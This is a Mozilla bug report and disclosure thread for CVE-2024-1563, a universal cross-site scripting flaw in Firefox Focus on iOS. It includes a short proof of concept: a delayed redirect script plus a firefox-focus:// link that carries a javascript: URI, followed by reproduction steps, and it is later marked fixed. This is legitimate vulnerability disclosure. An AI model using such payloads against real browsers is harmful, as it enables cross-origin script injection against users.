Closed Bug 1863831 (CVE-2024-1563) Opened 11 months ago Closed 8 months ago

Full UXSS via opening Firefox Focus externally after silent background navigation

Categories

(Focus :: Security: iOS, defect)

Firefox 122
defect

Tracking

(firefox123 fixed)

RESOLVED FIXED
123 Branch
Tracking Status
firefox123 --- fixed

People

(Reporter: proof131072, Unassigned)

Details

(Keywords: csectype-sop, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(5 files)

We are able to achieve Full UXSS by calling iOS Firefox Focus externally after silent background navigation.

PoC:

https://pwning.click/googleloc.php (Open in Firefox Focus and leave the browser; the last thing the user has seen is only https://pwning.click/googleloc.php)

<script>setTimeout(function() {location="https://google.com"}, 3000);</script>

https://pwning.click/focuslink.php (Open with other browsers/apps like iOS Chrome)

<a href="firefox-focus://open-url?url=javascript:document.write(document.domain)">Open with Firefox Focus</a>

Flags: sec-bounty?

This is all possible (Full UXSS) because iOS Firefox Focus allows silent background navigation while the user has left the browser.

Group: firefox-core-security → mobile-core-security
Component: Security → General
Product: Firefox → Firefox for iOS
Component: General → Security: iOS
Product: Firefox for iOS → Focus

Is that running a javascript: URI with the firefox URI? That doesn't become UXSS on Firefox, but it does become Full UXSS on Focus, which is a very serious issue.

Please check this Apple default mail app case too: https://pwning.click/RPReplay_Final1705153539.mp4

Flags: needinfo?(nish.bhasin)

Here's a summary from the above comment and links. Could you confirm this is accurate :james?

Steps to reproduce

  1. Navigate to https://pwning.click/googleloc.php
  2. Leave Focus application (by moving it to background)
  3. Open Safari
  4. Navigate to https://pwning.click/focuslink.php in Safari
  5. Click on the link "Open with Firefox Focus"

Actual behavior

Focus is opened and JavaScript is running

Expected behavior

Focus is opened and JavaScript should not be running

Flags: needinfo?(nish.bhasin)

Yeah, that's correct; this had the same steps as the one Nish told Andrei: https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c14

Thanks for confirming!

We can now close this report, so the new one Andrew added for See Also, which is https://bugzilla.mozilla.org/show_bug.cgi?id=1876851, can also be tracked correctly in the future. Thanks!

OK, I'll mark it as a duplicate of 1876851 so we keep only one bug open for the STR listed here.

Status: NEW → RESOLVED
Closed: 8 months ago
Duplicate of bug: 1876851
Resolution: --- → DUPLICATE

Thanks, but I believe this should be marked as resolved not duplicate due to https://github.com/mozilla-mobile/focus-ios/commit/0ecc6ed809a65c408c2216b9fe45abf9185f96eb for v122.

Ok I can make that change

No longer duplicate of bug: 1876851
Resolution: DUPLICATE → FIXED
Group: mobile-core-security → core-security-release
Alias: CVE-2024-1563

Hey, sorry for the hassle, but could you update the tracking flags to indicate which version it was fixed in? It helps us with bookkeeping. Thank you!

Flags: needinfo?(lmarceau)
Attached file advisory.txt
Flags: needinfo?(lmarceau)

Putting the needinfo back: looks like it was inadvertently removed when the advisory attachment was added. I suppose the advisory implies this was fixed in v123? It would still be nice to update the status flags to say that explicitly.

Flags: needinfo?(lmarceau)
Flags: needinfo?(lmarceau)
Version: unspecified → Firefox 123

Yes it was for v123! Hopefully I marked the right fields in the ticket here

This is supposed to be fixed on v122 https://github.com/mozilla-mobile/focus-ios/pull/3973

Ah sorry James you're right! Let me adjust this.

Version: Firefox 123 → Firefox 122

No worries, thanks!

status-firefox123: fixed is true, even if it's not the first version that was fixed. Unfortunately we can't set the older fields, as they get made read-only in Bugzilla to reduce clutter.

This one is less universal than the previous one (involves user interaction with the other app) but still a valid UXSS

Flags: sec-bounty? → sec-bounty+
Target Milestone: --- → 123 Branch
Group: core-security-release
